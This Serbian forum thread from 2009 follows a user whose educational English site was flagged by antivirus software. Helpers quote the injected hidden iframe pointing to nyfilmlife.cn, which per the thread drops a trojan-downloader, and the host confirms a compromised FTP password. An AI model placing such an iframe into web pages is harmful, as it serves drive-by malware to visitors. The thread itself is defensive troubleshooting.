Blokiran sajt - potrebna pomoc

Blokiran sajt - potrebna pomoc

offline
  • Pridružio: 14 Mar 2009
  • Poruke: 30

Od danas AVG blokira sajt koji povremeno azuriram i za koji znam da je cist i ispravan. Sta da radim, kako to da resim, kome da se obratim? U pitanju je obican html sajt reaching-english.com

P.S. Nece me biti sledeca dva dana tu pa cu predlozena resenja isprobati kad dodjem. Do tada cu poludeti Sad



Registruj se da bi učestvovao u diskusiji. Registrovanim korisnicima se NE prikazuju reklame unutar poruka.
offline
  • PHP developer
  • Pridružio: 22 Mar 2006
  • Poruke: 3760
  • Gde živiš: 127.0.0.1

<iframe src="http://nyfilmlife.cn:8080/index.php" width=156 height=125 style="visibility: hidden"></iframe>

Jesi li ovo namerno ubacio? Mislim da nisi - zasto bi ubacio sakriveni IFRAME, koji i FF markira kao Reported attack site?



offline
  • Pridružio: 14 Mar 2009
  • Poruke: 30

Napisano: 14 Jun 2009 1:15

Naravno da nisam namerno ubacila. Sajt ima edukativnu svrhu, namenjen je profesorima i ucenicima. Sta da radim???? Ima li nekoga ko mi moze pomoci? Sad Da li je moguce da to neko drugi uradi?

Dopuna: 14 Jun 2009 1:20

Inace sajt sam azurirala pre 7 do 10 dana. Od tada nista nisam menjala. Zadnjih 7 dana i unazad sve radilo normalno, a danas se desilo ovo.

Dopuna: 14 Jun 2009 2:10

Popravila sam tako sto sam sa hdd uploadovala sajt, ali mi ostaju dva pitanja:

1. kako se to desilo, da li je zla namera ili je mozda do servera onih koji mi obezbedjuju hosting?

2. Kako spreciti da se to ne ponovi i da li se obratiti provajderu za pomoc?

offline
  • Civil 
  • Novi MyCity građanin
  • Pridružio: 14 Jun 2009
  • Poruke: 3

Moguce da je do hostinga.kontaktiraj ih i vidi jel jos neko ima tih problema.
Najbolje bi bilo da ti obrisu sve i ponovo kreiraju nalog.Promeni lozinku za pristup serveru.
ako budes imala i dalje problema,javi se ovde,da nadjemo neko resenje.Poz

offline
  • Pridružio: 04 Sep 2003
  • Poruke: 24135
  • Gde živiš: Wien

Napisano: 14 Jun 2009 22:35

Pogledao sam onaj IFRAME.
Maliciozan je svakako, i koristi par exploita da bi skinuo jedan trojan-downloader, koji ce nakon toga skinuti drugi fajl i ubaciti ga kao C:\Documents and Settings\user\Start Menu\Programs\Startup\rncsys32.exe

Za sada ni jedan antivirus ne detektuje ove fajlove Sad


@FaithM
Moraces da pogledas sa adminom servera sta sve ima od aplikacija na serveru koje nisu updateovane, jer je hacker ocigledno iskoristio neki propust da bi ubacio ovo.

Dopuna: 14 Jun 2009 22:45

Pogledao sam i ostale sajtove koji su hostovani na istom serveru i ni jedan od njih nije zarazen. Znaci, nesto je imalo na ovom sajtu sto je hakeru pruzilo mogucnost da upadne.
Eventualno da je komp bio zarazen nekom infekcijom koja je promenila sve HTML fajlove na lokalnom disku (cini mi se da su neke Fujack infekcije radile bas tako nesto).

offline
  • Pridružio: 14 Mar 2009
  • Poruke: 30

Napisano: 14 Jun 2009 23:40

Hvala vam puno obojici. Sutra cu kontaktirati admina servera i javiti vam sta mi je odgovorio. Ako je zaista nekome bilo u interesu da se igra ovakvim sajtom, onda mi zaista ne ide u glavu zasto bi to uradio. No, dobro. Jos jednom vam hvala obojici, javljam se sa odgovorom cim ga dobijem.

P.S. Citiracu i vas kada mu se budem obracala, jer nisam toliko strucna. Ako neko ima nesto da doda, neka mi poslaje Pm.

Dopuna: 14 Jun 2009 23:43

bobby ::Napisano: 14 Jun 2009 22:35

Eventualno da je komp bio zarazen nekom infekcijom koja je promenila sve HTML fajlove na lokalnom disku (cini mi se da su neke Fujack infekcije radile bas tako nesto).


Posto sam sa lokalnog diska uploadovala html fajlove i cini se time popravila stvar, da li to iskljucuje mogucnost da su oni zarazeni obzirom da sada sve radi?

offline
  • Pridružio: 04 Sep 2003
  • Poruke: 24135
  • Gde živiš: Wien

Nisi jedina zrtva ovakvog ubacivanja frejma.
U zadnje vreme ovo je postala prava kuga.

Pitao sam i ja neke prijatelje ako znaju sta ovi obicno koriste da bi ubacili ove frejmove, pa javljam ako nesto saznam od njih.

Ako su fajlovi sa tvog diska OK, i niko drugi ne odrzava ovaj sajt, onda iskljucujemo mogucnost lokalne zaraze na tvom kompu.

offline
  • Pridružio: 14 Mar 2009
  • Poruke: 30

Odgovor administratora servera:

Vašoj prezentaciji je pristupano 7.6.2009 i 9.6.2009 putem FTP konekcije iz Sjedinjenih Država. Ukoliko nemate administratore tamo, možemo smatrati da je Vaša FTP šifra kompromitovana.

Potrebno je da zatražite izmenu FTP šifre.

Nakon izmene je potrebno da preuzmete prezentaciju i izvšite skeniranje antivirusnim programom iste,a nakon toga je vratite na hosting server. Ukoliko imate backup prezentacije, samo obrišite postojeću i nakon potvrde o izmeni lozinke postavite backup.

Takođe povedite računa o zaštiti Vašeg računara, jer su šifre najčešće kompromitovane tako što sam korisnik ima zaražen računar sa koga virusi (trojanci) javljaju šifre.

E sad se ja pitam, kome je toliko dosadno da hakuje mali srpski sajt Sad

Ko je trenutno na forumu
 

Ukupno su 891 korisnika na forumu :: 34 registrovanih, 4 sakrivenih i 853 gosta   ::   [ Administrator ] [ Supermoderator ] [ Moderator ] :: Detaljnije

Najviše korisnika na forumu ikad bilo je 3466 - dana 01 Jun 2021 17:07

Korisnici koji su trenutno na forumu:
Korisnici trenutno na forumu: 357magnum, _Rade, A.R.Chafee.Jr., bojcistv, ceman, cenejac111, DeerHunter, djuradj, Dogma21, DPera, Dr.Strangelove, Dukelander, goxin, jeen yuhs, kolle.the.kid, kre10oid, ladro, Lieutenant, Marko Marković, mercedesamg, milan.vukovic, milenko crazy north, Neutral-M, ObelixSRB, raptorsi, Rocky I, royst33, ruma, Srki94, stegonosa, Stoilkovic, Trpe Grozni, Vlada78, YugoSlav